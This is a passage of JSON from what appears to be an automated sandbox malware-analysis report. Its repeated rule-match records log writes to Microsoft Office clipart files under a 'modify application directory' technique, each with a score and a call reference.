"built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02470U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02470u.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41927", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02470u.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02503U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02503u.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41936", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02503u.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02567J.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02567j.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41945", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02567j.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02736G.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02736g.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41956", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02736g.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02736U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02736u.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41965", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02736u.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02738U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02738u.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41974", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02738u.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02740G.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02740g.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41985", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02740g.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02740U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02740u.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41994", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02740u.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02742G.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02742g.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42003", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02742g.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02742U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02742u.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42012", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02742u.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02743G.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02743g.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42021", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02743g.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02746G.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02746g.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42030", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02746g.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02746U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02746u.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42039", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02746u.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02748G.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02748g.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42048", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02748g.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02748U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02748u.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42057", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02748u.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02749G.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02749g.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42066", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02749g.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02749U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02749u.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42077", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02749u.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02750G.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02750g.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42088", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02750g.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02750U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02750u.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42097", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02750u.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02752G.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02752g.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42114", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02752g.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02752U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02752u.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42127", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02752u.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02753U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02753u.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42136", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02753u.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02754U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02754u.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42155", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02754u.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02755U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02755u.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42174", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02755u.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02756U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02756u.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42193", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02756u.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02757U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02757u.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42224", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02757u.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02758U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02758u.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42255", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02758u.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02759J.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02759j.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42286", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02759j.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02810J.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02810j.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42297", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02810j.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02829J.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02829j.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42310", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02829j.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02845G.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02845g.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42323", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02845g.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02897J.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02897j.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42330", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02897j.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03011U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph03011u.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], 